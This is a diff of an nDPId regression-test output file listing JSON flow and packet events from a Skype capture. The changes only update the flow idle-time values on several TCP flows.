+00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1062,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1431970674018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970674018,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxdyEUu77fnywjBZqASOJAmdQAAAgQFrAQCCApO3xkOPjIfpgEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1063,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1431970674018,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970674018,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0ax5AAEAGhGTAqAEi1cezr8hFnF3LCMFmLu+36IAQECx9awAAAQEICj4yH9pO3xkO"} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/ed8AAEARbbrAqAEinTg0EjLdgQkAK+56e5UCujNYWaHOaIv8Mbnq8Yy9ltzxTGOAleIkOtVygbgwGI4="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1079,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -640,30 +640,30 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1431970674981,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970674981,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2DYgAAEAR1ZfAqAEinTc4ljLdnE4AIk81e5kCIa6rFGHkjW7tTxYGLEfEQXIXcRjIprw="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1081,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970674981,"flow_last_seen":1431970674981,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970674981,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.150","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675578,"flow_last_seen":1431970675578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970675578,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1431970675578,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675578,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVJFAAEAGmuXAqAEi1cezr8hHAbtzmW86AAAAALAC\/\/\/ayQAAAgQFtAEDAwUBAQgKPjIl6QAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1431970675640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970675640,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7yEfSVR1Cc5lvO6ASOJBaGQAAAgQFrAQCCApO3xqhPjIl6QEDAwk="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1431970675641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970675641,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0n6FAAEAGT+HAqAEi1cezr8hHAbtzmW870lUdQ4AQECyxBQAAAQEICj4yJidO3xqh"} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABAxtRAAEAGKUnAqAEinTfrmMhInF05JqawAAAAALAC\/\/9CLwAAAgQFtAEDAwUBAQgKPjInhAAAAAAEAgAA"} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675578,"flow_last_seen":1431970675578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970675578,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":51271,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1087,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":1431970675578,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675578,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVJFAAEAGmuXAqAEi1cezr8hHAbtzmW86AAAAALAC\/\/\/ayQAAAgQFtAEDAwUBAQgKPjIl6QAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":2,"flow_last_seen":1431970675640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970675640,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7yEfSVR1Cc5lvO6ASOJBaGQAAAgQFrAQCCApO3xqhPjIl6QEDAwk="} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1090,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":3,"flow_last_seen":1431970675641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970675641,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0n6FAAEAGT+HAqAEi1cezr8hHAbtzmW870lUdQ4AQECyxBQAAAQEICj4yJidO3xqh"} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1095,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51272,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABAxtRAAEAGKUnAqAEinTfrmMhInF05JqawAAAAALAC\/\/9CLwAAAgQFtAEDAwUBAQgKPjInhAAAAAAEAgAA"} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAABB4XAAAEARAafAqAEinTc4kzLdnE4ALQw6e5sCLpawwxGRzNJ9jeoeh5bY+9RpiszLnAcSdcNuRnMOI9PLQQ=="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1096,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.147","src_port":13021,"dst_port":40014,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1431970675992,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970675992,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1ktIAAEARBdLAqAEiQTffEjLdnFkAIdOte50CPL9ZRieP6CLGvHSnuteGzwQxXE6Sug=="} 00666{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1097,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970675992,"flow_last_seen":1431970675992,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970675992,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1431970676061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970676061,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIpxdyEgRBN2QOSamsaASOJC3pAAAAgQFrAQCCApMXif\/PjInhAEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1431970676061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970676061,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FvZAAEAG2TPAqAEinTfrmMhInF05JqaxEQTdkYAQECwOiwAAAQEICj4yJ8hMXif\/"} +00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1100,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1431970676061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970676061,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIpxdyEgRBN2QOSamsaASOJC3pAAAAgQFrAQCCApMXif\/PjInhAEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1101,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1431970676061,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970676061,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FvZAAEAG2TPAqAEinTfrmMhInF05JqaxEQTdkYAQECwOiwAAAQEICj4yJ8hMXif\/"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1431970676959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431970676959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2RjwAAEAR6djAqAEinTfroDLdnFYAIpfGe58CtglNf35c9xed\/TOYZPtdg4AQKYWmKBE="} 00668{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1131,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.160","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1431970676959,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970676959,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5iSIAAEARWf7AqAEinTc4kjLdnF4AJWUse6ECi+HEJAzVpo3ery\/yzADPEQnmy2088qUgojE="} 00667{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1132,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970676959,"flow_last_seen":1431970676959,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970676959,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.146","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677603,"flow_last_seen":1431970677603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970677603,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1431970677603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970677603,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVVtAAEAGmsLAqAEinTfrmMhKAbuh9dLFAAAAALAC\/\/9BpgAAAgQFtAEDAwUBAQgKPjItyQAAAAAEAgAA"} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1431970677668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970677668,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIgG7yErORgmHofXSxqASOJDMTwAAAgQFrAQCCApMXimSPjItyQEDAwk="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1431970677668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970677668,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tRpAAEAGOw\/AqAEinTfrmMhKAbuh9dLGzkYJiIAQECwjOgAAAQEICj4yLglMXimS"} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677603,"flow_last_seen":1431970677603,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431970677603,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.152","src_port":51274,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1138,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1431970677603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431970677603,"pkt":"0NQSxnP1PBXCt3IOCABFAABAVVtAAEAGmsLAqAEinTfrmMhKAbuh9dLFAAAAALAC\/\/9BpgAAAgQFtAEDAwUBAQgKPjItyQAAAAAEAgAA"} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1139,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1431970677668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970677668,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADYG+iGdN+uYwKgBIgG7yErORgmHofXSxqASOJDMTwAAAgQFrAQCCApMXimSPjItyQEDAwk="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1140,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1431970677668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431970677668,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0tRpAAEAGOw\/AqAEinTfrmMhKAbuh9dLGzkYJiIAQECwjOgAAAQEICj4yLglMXimS"} 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970677974,"flow_last_seen":1431970677974,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970677974,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.170","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1148,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1431970677974,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970677974,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+xqAAAEAR0mLAqAEinTeCqjLdnFIAKv3he6MC3h4IlBBBiQEMzD2u81WGXlCVYngNZSbA0YydRzOnaw=="} 